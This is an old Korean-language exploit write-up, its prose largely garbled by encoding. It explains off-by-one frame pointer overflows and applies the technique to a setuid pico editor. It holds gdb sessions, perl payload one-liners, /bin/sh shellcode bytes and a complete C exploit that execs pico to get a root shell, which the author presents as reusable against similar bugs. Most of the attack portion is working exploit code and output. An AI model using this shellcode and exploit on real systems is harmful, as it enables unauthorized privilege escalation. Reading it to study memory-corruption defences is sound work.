======================================================================================= Title: Frame Pointer Overflow of other method Author : À¯µ¿ÈÆ (Xpl017Elz) E-mail : szoahc@hotmail.com Home: http://x82.i21c.net Date: f. 2001/10/12 s. 2001/11/22 ======================================================================================= * Content: 0x00. ¹è°æÁö½Ä ¼³¸í 0x01. Training 0x02. Frame Pointer Overflow of other method 0x03. Realattack :-) - 0x00. System Check - 0x01. Bug Testing - 0x02. Training - 0x03. pico frame pointer overflow - 0x04. exploit * Frame Pointer °ø°Ý¿¡ ´ëÇÑ ±âº»Áö½ÄÀÌ ¾ø´ÂºÐµéÀº ¸ÕÀú phrack 55È£ 8¹ø° ±ÛÀ» ÂüÁ¶Çϱ⠹ٶõ´Ù. URL: http://www.phrack.org/show.php?p=55&a=8 ======================================================================================= 0x00. ¹è°æÁö½Ä ¼³¸í Frame Pointer¶õ Stack PointerÀÇ °ªÀ» °¡Áö°í Áö¿ªº¯¼öÀÇ Base Pointer°¡ µÇ´Â RegisterÀÌ´Ù. (%ebp Register) º¸Åë Frame Pointer Overflow °ø°Ý ´ë»ó ProgramÀº ´ÙÀ½°ú °°Àº StackÀÇ structure¸¦ °®´Â´Ù. *----------------* | buffer | data input buffer *----------------* *----------------* | e b p | function() %ebp: 4byte +----------------* *----------------* | function() RET | function() Return address: 4byte *----------------* *----------------* | e b p | main() %ebp: 4byte *----------------* *----------------* | main() RET | main() Return address: 4byte *----------------* ´ëºÎºÐ Frame Pointer Overflow°¡ ÀϾ´Â °ÍÀº function() ÇÔ¼öÀÇ %ebp ¸¶Áö¸· 1byte ¿µ¿ªÀÌ´Ù. (¾Æ·¡ÀÇ ¿¹Á¦ source °°Àº °æ¿ì¶ó°í º¼¼öÀÖ´Ù.) function(char *argument) { char buffer[80]; int count; for(count=0;count<=80;count++) buffer[count]=argument[count]; } ÀԷ¹޴ buffer°ªº¸´Ù ´Ü, 1byte¸¦ ÃÊ°úÇÑ´Ù. ÀÌ·Î½á ¿ì¸®´Â %ebp ¸¶Áö¸· ÁÖ¼Ò¸¦ º¯°æÇÒ¼ö ÀְԵȴÙ. ¸¸¾à main()ÇÔ¼öÀÇ ³¡¿¡¼­ function()ÇÔ¼ö°¡ ºÒ·ÁÁø ÈÄ¿¡ %ebp°¡ %esp·Î ÀúÀåµÈ´Ù¸é, ¿ì¸®´Â %esp¸¦ ÀÓÀÇ·Î ¼³Á¤ÇÒ¼ö ÀְԵȴÙ. 
[x82@testsub x82]$ gcc -v Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release) [x82@testsub x82]$ gdb test ... (gdb) break *main+54 Breakpoint 1 at 0x80486a2 (gdb) r `perl -e 'print "x"x80;print "\x50"'` Starting program: /home/x82/test `perl -e 'print "x"x80;print "\x50"'` Breakpoint 1, 0x80486a2 in main () (gdb) info reg eax 0x1 1 ecx 0x400 1024 edx 0x401063c0 1074815936 ebx 0x40107bec 1074822124 esp 0xbffff954 -1073743532 ebp 0x7 7 esi 0x4000a600 1073784320 edi 0xbffffa34 -1073743308 eip 0x80486a2 134514338 eflags 0x286 646 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x0 0 cwd 0xffff037f -64641 swd 0xffff0000 -65536 twd 0xffffffff -1 fip 0x401ecbd8 1075760088 fcs 0x6d90023 114884643 fopo 0x0 0 fos 0xffff002b -65493 (gdb) x/10 $esp 0xbffff954: 0xbffff974 0x0804861a 0x08048717 0x00000050 0xbffff964: 0x4000a600 0x0000001a 0x00000078 0x00000078 0xbffff974: 0xbffff9dc 0x08048663 (gdb) %ebpÀÇ ¸¶Áö¸· 1byte¸¦ "\x50"À¸·Î OverwriteÇÑ °á°ú, %esp´Â %ebpº¸´Ù 4byte¸¸Å­ Áõ°¡ÇÏ¿´´Ù. À̸¦ ÅëÇØ Stack Pointer±îÁö º¯°æÇÏ¿´´Ù. °ø°ÝÀÚ´Â %espÀÇ º¯°æÀ» ÅëÇØ Processer°¡ StackÀ¸·ÎºÎÅÍ Æ¯Á¤°ªµµ %eipÀΰÍó·³ ¼Ó¿© ½ÇÇàÆÐÅÏÀ» º¯°æÇÒ¼ö ÀÖ´Ù. Áï, Return address¿¡ Á¢±ÙÇÏÁö ¾Ê°íµµ ´Ü 1byte º¯°æÀ» ÅëÇØ ProgramÀÇ ½ÇÇàÆÐÅÏÀÇ º¯°æÀÌ °¡´ÉÇÏ´Ù´Â ¾ê±â´Ù. Âü°í·Î Phrack 55-8È£ÀÇ ±ÛÀ̳ª ±âŸ Frame Pointer Overflow ¹®¼­¸¦ º¸¸é, %esp°¡ shellcode address¸¦ ´ã°íÀÖ´Â ÁÖ¼Ò¸¦ °¡¸®Å°°Ô ÇϹǷνá shellÀÇ ½ÇÇàÀ» ÅëÄèÇÏ°Ô È®ÀνÃÄÑÁØ´Ù. ±×·³ À̹ø¿£ °£´ÜÇÑ Training ÀÛ¾÷À» °ÅÄ¡°í ³Ñ¾î°¡µµ·Ï ÇÏÀÚ. 0x01. Training (gdb) r `perl -e 'print "x"x80'` Starting program: /home/x82/test `perl -e 'print "x"x80'` Program received signal SIGILL, Illegal instruction. 0xbffff124 in ?? 
() (gdb) x/10 0xbffff104 (0xbffff100 + 4byte) 0xbffff104: 0xbffff124 0x0804861a 0x08048717 0x00000000 ~~~~~~~~~~ 0xbffff114: 0x4000a610 0x0000001a 0x00000078 0x00000078 0xbffff124: 0xbffff18c 0x08048663 (gdb) r `perl -e 'print "x"x36;print "\x11\x11\x11\x11";print "x"x40;print "\x5c"'` Starting program: /home/x82/test `perl -e 'print "x"x36;print "\x11\x11\x11\x11";print "x"x40;print "\x5c"'` Program received signal SIGSEGV, Segmentation fault. 0x11111111 in ?? () (gdb) ... (gdb) info reg eax 0x1 1 ecx 0x400 1024 edx 0x40104c60 1074809952 ebx 0x4010648c 1074816140 esp 0xbffff164 0xbffff164 ebp 0x78787878 0x78787878 esi 0x4000a610 1073784336 edi 0xbffff1e4 -1073745436 eip 0x11111111 0x11111111 eflags 0x10282 66178 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x0 0 (gdb) ¿øÇϴ¹٠%eip°ªÀÌ 0x11111111·Î º¯°æµÇ¾ú´Ù. ±×·³ À̹ø¿£ \x11\x11\x11\x11 ´ë½Å, shellcodeÀÇ address·Î ´ëÀÔÇغ¸ÀÚ. ½Å¼ÓÇÑ ÀÛ¾÷À» À§ÇØ eggshell ProgramÀ» ÀÌ¿ëÇÏ¿© ÀÏÁ¤ Stack¿¡ shellcode¸¦ pushÇÏ°í ÁÖ¼Ò°ªÀ» ¾ò¾ú´Ù. [x82@testsub x82]$ ./eggshell Using address: 0xbffffba8 bash$ 0xbffffba8 °ªÀ» ÀúÀåÇÒ ÁÖ¼Ò´Â 0xbffff170ÀÌ´Ù. (¿¹»ó) ¿ì¸®´Â ÀÌ¹Ì ¸¶Áö¸·¿¡ Overwrite µÇ¾îÁö´Â %ebp°ªÀÌ 4byte Áõ°¡ÇÒ %esp¶õ°ÍÀ» ¾Ë±â¶§¹®¿¡ "\x6c"(0xbffff170 - 4byte = 0xbffff16c)¶ó´Â ÁÖ¼Ò¸¦ ¾òÀ»¼ö ÀÖ´Ù. ±×, °á°ú ... bash$ perl -e 'system "./test","xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\xa8\xfb\xff\xbfxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\x6c"' bash# bash# ls -al test -rwsr-xr-x 1 root root 12586 Nov 24 14:33 test bash# ¿ì¸®ÀÇ ¿¹»óÀº ¸Â¾Æ ¶³¾îÁ³´Ù. %eip addressÀÇ °ªÀº 0xbffffba8À» ¶ì°í ÀÖÀ»°ÍÀÌ´Ù. ±×·¸´Ù¸é, À§¿Í´Â ¾à°£ ´Ù¸¥ ¹æ¹ýÀ» ÀÌ¿ëÇØ shellÀ» ¶ç¿öº¸µµ·Ï ÇÏ°Ú´Ù. 0x02. Frame Pointer Overflow of other method ÀϹÝÀûÀÎ Composition: NOP - 56byte Shellcode - 24byte Last %ebp - 1byte Total - 81byte (gdb) r `perl -e 'print "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\ ... Áß·« ... 
\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'` Starting program: /home/x82/f `perl -e 'print "\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\ ... Áß·« ... \x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'` Breakpoint 1, 0x80486a2 in main () (gdb) x/80 0xbffffb00 0xbffffb00: 0x00000007 0xbffffb24 0x0804861a 0x08048717 0xbffffb10: 0x00000000 0x4000a610 0x0000001a 0x00000078 0xbffffb20: 0x00000078 0xbffffb8c 0x08048663 0xbffffb3c 0xbffffb30: 0x00000078 0x4010648c 0x00000051 0x90909090 0xbffffb40: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffb50: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffb60: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffb70: 0x90909090 0x6852d231 0x68732f6e 0x622f2f68 0xbffffb80: 0x52e38969 0x8de18953 0x80cd0b42 0xbffffb00 ~~~~~~~~~~ 0xbffffb90: 0x0804869e 0xbffffce9 0xbffffbb8 0x400301eb 0xbffffba0: 0x00000002 0xbffffbe4 0xbffffbf0 0x40012024 ... (gdb) c Continuing. Program received signal SIGILL, Illegal instruction. 0xbffffb24 in ?? () (gdb) c Continuing. 0xbffffb00 + 4byte = 0xbffffb04 ¶§¹®¿¡, 0xbffffb24 °ªÀ» ¶Ç °Çµé°í ¸»¾Ò´Ù. À̹ø¿£ "\x90" °ªÀ¸·Î Overwrite¸¦ ½ÃµµÇÏ°Ú´Ù. (µÞºÎºÐ ÂüÁ¶) Program terminated with signal SIGILL, Illegal instruction. The program no longer exists. (gdb) r `perl -e 'print "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\ ... Áß·« ... \x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80\x90"'` ~~~~ Starting program: /home/x82/f `perl -e 'print "\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\ ... Áß·« ... 
\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80\x90"'` Breakpoint 1, 0x80486a2 in main () (gdb) info reg eax 0x1 1 ecx 0x400 1024 edx 0x40104c60 1074809952 ebx 0x4010648c 1074816140 esp 0xbffffb94 0xbffffb94 ~~~~~~~~~~ ebp 0x804869e 0x804869e esi 0x4000a610 1073784336 edi 0xbffffbe4 -1073742876 eip 0x80486a2 0x80486a2 eflags 0x282 642 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x0 0 (gdb) x/10 0xbffffb94 0xbffffb94: 0xbffffce8 0xbffffbb8 0x400301eb 0x00000002 ~~~~~~~~~~ 0xbffffba4: 0xbffffbe4 0xbffffbf0 0x40012024 0x00000002 0xbffffbb4: 0x08048390 0x00000000 (gdb) x/10 0xbffffce8 0xbffffce8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffcf8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffd08: 0x90909090 0x90909090 (gdb) ÀÌ°Ô ¾îÂîµÈ ÀÏÀΰ¡? °ø°ÝÀÚ°¡ ÀÔ·ÂÇÑ NOP°¡ ´Ù¸¥¿µ¿ª¿¡ ÀÚ¸® Àâ°íÀÖ´Ù. °ú¿¬, ¿ì¿¬ÀÇ ÀÏÄ¡Àϱî? (gdb) x/80 0xbffffb00 0xbffffb00: 0x00000007 0xbffffb24 0x0804861a 0x08048717 0xbffffb10: 0x00000090 0x4000a610 0x0000001a 0x00000078 0xbffffb20: 0x00000078 0xbffffb8c 0x08048663 0xbffffb3c 0xbffffb30: 0x00000078 0x4010648c 0x00000051 0x90909090 0xbffffb40: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffb50: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffb60: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffb70: 0x90909090 0x6852d231 0x68732f6e 0x622f2f68 0xbffffb80: 0x52e38969 0x8de18953 0x80cd0b42 0xbffffb90 0xbffffb90: 0x0804869e 0xbffffce8 0xbffffbb8 0x400301eb ... Áß ·« ... 
0xbffffca0: 0x00000010 0x0387f9ff 0x0000000f 0xbffffcd7 0xbffffcb0: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffcc0: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffcd0: 0x00000000 0x69000000 0x00363836 0x6d6f682f 0xbffffce0: 0x38782f65 0x00662f32 0x90909090 0x90909090 0xbffffcf0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffd00: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffd10: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffd20: 0x6852d231 0x68732f6e 0x622f2f68 0x52e38969 0xbffffd30: 0x8de18953 0x80cd0b42 0x454c0090 0x504f5353 0xbffffd40: 0x7c3d4e45 0x7373656c 0x65706970 0x2068732e À§¸¦ º¸¸é, ¿ì¸®°¡ ÀÔ·ÂÇÑ data °ªÀÌ µÎ¹ø ¹Ýº¹µÇ¾î pushµÈ°ÍÀ» º¼¼öÀÖ´Ù. ÀÌ·¯ÇÑ Çö»óÀº ¸Å¿ì ´ç¿¬ÇÑ ÀÏÀÌ´Ù. ù¹ø°(0xbffffb3c) pushµÈ ¿µ¿ªÀº »ç¿ëÀÚ°¡ Á÷Á¢ÀûÀ¸·Î ÀÔ·ÂÇÑ ºÎºÐÀÌ°í, ±× ¾Æ·¡(0xbffffce8) pushµÈ ¿µ¿ªÀº ±× °ªÀÌ º¹»çµÈ ºÎºÐÀÌ´Ù. Structure: ù¹ø°(0xbffffb3c) pushµÈ ¿µ¿ª - argument[81]; ±× ¾Æ·¡(0xbffffce8) pushµÈ ¿µ¿ª - buffer[81]; ±×·¯¹Ç·Î, function() ÇÔ¼ö Return addressÀÇ ´ÙÀ½ 4byte¿¡ Á¸ÀçÇÏ´Â code¸¦ ½ÇÇàÇϸé, shellcode address¸¦ ¶ç´Â ÁÖ¼Ò¸¦ °¡¸®Å°Áö ¾Ê¾Æµµ shellÀ» ¶ç¿ï¼ö Àִ°ÍÀÌ´Ù. bash$ perl -e 'system "./test","\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80\x90"' bash# À̾ß~ ¿ª½Ã, Çѹø¿¡ ¼º°øÇÏ¿´´Ù. :-) ±×·¯¹Ç·Î, ´ÙÀ½°ú °°Àº °á·ÐÀ» ÁöÀ»¼ö ÀÖ´Ù. * ÀϹÝÀûÀÎ Frame Pointer °ø°Ý: [nops][shellcode][&shellcode][%ebp_altering_byte] Total - 81byte * ¾à°£ ´Ù¸¥ CompositionÀÇ Frame Pointer °ø°Ý: [nops][shellcode][%ebp_altering_byte] (1byte´Â function() ÇÔ¼öÀÇ Return address À§Ä¡¸¦ °¡¸®Å²´Ù) Total - 81byte Á¤È®È÷ ¸»ÇÏÀÚ¸é, %esp°¡ °¡¸®Å°´Â address´Â function() ÇÔ¼öÀÇ Return address 4byte µÞºÎºÐÀ̶ó ÇÏ°Ú´Ù. ¹°·Ð °ø°ÝÀÚ°¡ °ªÀ» ´ëÀÔÇÒ¶§´Â 4byte °¨¼ÒÇÑ °ªÀ» ³Ö´Â´Ù. 
(function() 함수의 Return address 위치) 이제 약간 새로운(?) 방식의 공격을 익혔으므로, 다음과 같은 Realattack을 구성해보자. 0x03. Realattack Pico editor (/usr/bin/pico) segfault? It's a frame pointer overflow vulnerability! - 0x00. System Check [x82@xpl017elz x82]$ uname -a Linux xpl017elz.org 2.2.14-5.0 #1 Thu Mar 16 02:23:03 KST 2000 i586 unknown [x82@xpl017elz x82]$ gcc -v Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release) [x82@xpl017elz x82]$ ls -la /usr/bin/pico -rwsr-xr-x 1 root root 160552 Jun 21 1999 /usr/bin/pico (An imitation environment was set up for this demonstration) - 0x01. Bug Testing [x82@xpl017elz x82]$ pico `perl -e "print 'x'x500"` UW PICO(tm) 3.5 New Buffer Segmentation fault [x82@xpl017elz x82]$ - 0x02. Training [x82@xpl017elz x82]$ ./eggshell Using address: 0xbffff9f8 bash$ cp /usr/bin/pico . bash$ gdb -q ./pico (no debugging symbols found)...(gdb) set args `perl -e 'print "x"x80'` (gdb) r Starting program: /home/x82/./pico `perl -e 'print "x"x80'` UW PICO(tm) 3.5 File: .../xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Modified test ^O File Name to write : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ^G Get Help ^T To Files ^C Cancel TAB Complete [ Wrote 2 lines ](no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x0 in ??
() TAB Complete (gdb) info reg eax 0x1 1 ecx 0x401463c0 1075078080 edx 0x401463c0 1075078080 ebx 0x0 0 esp 0xbfffef08 -1073746168 ~~~~~~~~~~ ebp 0x0 0 esi 0x0 0 edi 0x0 0 eip 0x0 0 ~~~ eflags 0x10246 66118 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x0 0 cwd 0xffff037f -64641 swd 0xffff0000 -65536 twd 0xffffffff -1 fip 0x401ecbd8 1075760088 fcs 0x6d90023 114884643 fopo 0x0 0 fos 0xffff002b -65493 (gdb) x/20 0xbfffef00 0xbfffef00: 0x00000000 0x00000000 0x00000000 0x00000000 0xbfffef10: 0x00000000 0x00000000 0x00000000 0x00000000 0xbfffef20: 0x00000000 0x78787878 0x78787878 0x78787878 0xbfffef30: 0x78787878 0x78787878 0x78787878 0x78787878 0xbfffef40: 0x78787878 0x78787878 0x78787878 0x78787878 (gdb) 0xbfffef50: 0x78787878 0x78787878 0x78787878 0x78787878 0xbfffef60: 0x78787878 0x78787878 0x78787878 0x78787878 0xbfffef70: 0x78787878 0xbfffef00 0x0805d62d 0x00000000 ~~~~~~~~~~(ebp) 0xbfffef80: 0x00000001 0x0000014f 0x08075968 0xbffff141 0xbfffef90: 0xbfffefd8 0x08049e18 0xbfffefd8 0x08049e21 (gdb) x 0xbfffef08 0xbfffef08: 0x00000000 (eip) (gdb) frame pointer overflow: 0xbfffef00 (ebp) + 4 = 0xbfffef04 (esp) 0xbfffef04 (esp) ----> 0x00000000 (eip) Conclusion: esp ----> 0xbffff9f8 (&shellcode) - 0x03. pico frame pointer overflow If 80 bytes are overwritten, a frame pointer overflow occurs. The value 0xbffff9f8 (&shellcode) is placed at address 0xbfffef34. ebp is altered to 0xbfffef30, and the shell executes. 0xbfffef30 (ebp) + 4 = 0xbfffef34 (esp) 0xbfffef34 (esp) ----> 0xbffff9f8 (&shellcode) bash$ perl -e 'system "/usr/bin/pico","xxxxxxxxxxxxxxxx\xf8\xf9\xff\xbfxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\x30\xef\xff\xbf\x2d\xd6\x05\ x08"' UW PICO(tm) 3.5 File: .../xxxxxxxxxxxxxxxxxxxxxxxxxx0ï¿-?E^H Modified test ^O [ Wrote 2 lines ]bash# uid=500(x82) gid=500(x82) euid=0(root) groups=500(x82) ^C Cancel TAB Complete bash# root bash# Kill is control-U (^U). Interrupt is control-C (^C). bash# Oops~ The shell was executed.
;-D If only "\x30" is written, the value becomes 0xbfff0030 instead of 0xbfffef30 and the program crashes. If "\x30\xef\xff\xbf" is written, RET becomes 0x0805d600 and the program crashes. Therefore the value below is used. "\x30\xef\xff\xbf\x2d\xd6\x05\x08" = 0xbfffef30 (ebp) 0x0805d62d (RET) - 0x04. exploit /* ** ** How to exploit? ** ** [x82@xpl017elz x82]$ gdb -q pico ** (no debugging symbols found)...(gdb) set args `perl -e 'print "x"x80'` ** (gdb) r ** Starting program: /home/x82/./pico `perl -e 'print "x"x80'` ** ** UW PICO(tm) 3.5 File: .../xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Modified ** ** test ** ^O ** [ Wrote 2 lines ](no debugging symbols found)... ** Program received signal SIGSEGV, Segmentation fault. ** 0x0 in ?? () TAB Complete ** (gdb) x/10 $esp ** 0xbffff908: 0x00000000 0x00000000 0x00000000 0x00000000 ** 0xbffff918: 0x00000000 0x00000000 0x00000000 0x78787878 ** 0xbffff928: 0x78787878 0x78787878 ** (gdb) ** 0xbffff930: 0x78787878 0x78787878 0x78787878 0x78787878 ** 0xbffff940: 0x78787878 0x78787878 0x78787878 0x78787878 ** 0xbffff950: 0x78787878 0x78787878 ** (gdb) ** 0xbffff958: 0x78787878 0x78787878 0x78787878 0x78787878 ** 0xbffff968: 0x78787878 0x78787878 0x78787878 0xbffff900 ** 0xbffff978: 0x0805d62d 0x00000000 ** ~~~~~~~~~~ ** (gdb) ** Return address Position = 0xbffff978 ** Return address value = 0x0805d62d ** [x82@xpl017elz x82]$ gcc -o picoxpl picoxpl.c ** [x82@xpl017elz x82]$ ./picoxpl ** ** UW PICO(tm) 3.5 File: .../shh//bi‰ãRS‰áB^K?€ˆù?-?^E^H^X Modified ** ** Get Root Shell :-) ** ^O ** [ Cannot open file for writing: No such file or directory ]bash# ** bash# reset ** Kill is control-U (^U). ** Interrupt is control-C (^C). ** bash# whoami ** root ** bash# id ** uid=500(x82) gid=500(x82) euid=0(root) groups=500(x82) ** bash# ls -al /usr/bin/pico ** -rwsr-xr-x 1 root root 160552 Jun 21 1999 /usr/bin/pico ** ~~~~~~~~~~ ^^ Do not be misled: the original pico is not setuid.
**/
#include
#include

/* NOTE(review): the two #include directives above lost their header names
** during extraction (most likely swallowed as HTML tags); as shown, this file
** does not compile. The listing is the author's 2001 proof of concept against
** a local setuid copy of pico on a kernel 2.2.14 / egcs-2.91.66 system from
** before today's stack mitigations; every address in it is specific to that
** session and machine.
**/

/* 24-byte payload; the same bytes are used in section 0x02 above. */
char shellcode[] =
    "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52"
    "\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

/* Builds the 88-byte argument and execs pico with it.
** Layout: 56 bytes of 0x90, the 24-byte payload, then two 4-byte values
** taken from the author's gdb session. Implicit-int main() is pre-C99
** style; exec[] is declared but never used.
**/
main()
{
    int count, num;
    char xOx[88], exec[1024];

    /* &xOx has type char (*)[88]; bzero takes void *, so this still zeroes
    ** the 88-byte array. */
    bzero(&xOx, 88);

    for (count = 0; count <= 55; count++) {
        xOx[count] = 0x90;
    }
    for (num = 0; num <= 23; num++) {
        xOx[count++] = shellcode[num];
    }

    /* Return address Position
    ** NOTE(review): 0xbffff988 here differs from the 0xbffff978 shown in the
    ** gdb session quoted above; presumably the stack layout differs when the
    ** program is launched via execl rather than from gdb -- unverified. */
    xOx[count++] = 0x88;
    xOx[count++] = 0xf9;
    xOx[count++] = 0xff;
    xOx[count++] = 0xbf;

    /* That have Return address value */
    xOx[count++] = 0x2d;
    xOx[count++] = 0xd6;
    xOx[count++] = 0x05;
    xOx[count++] = 0x08;

    execl("/usr/bin/pico", "pico", xOx, NULL);
}

/* The beauty of this is that it is simple.
** If a program has a general frame pointer overflow,
** this exploit may be used.
**/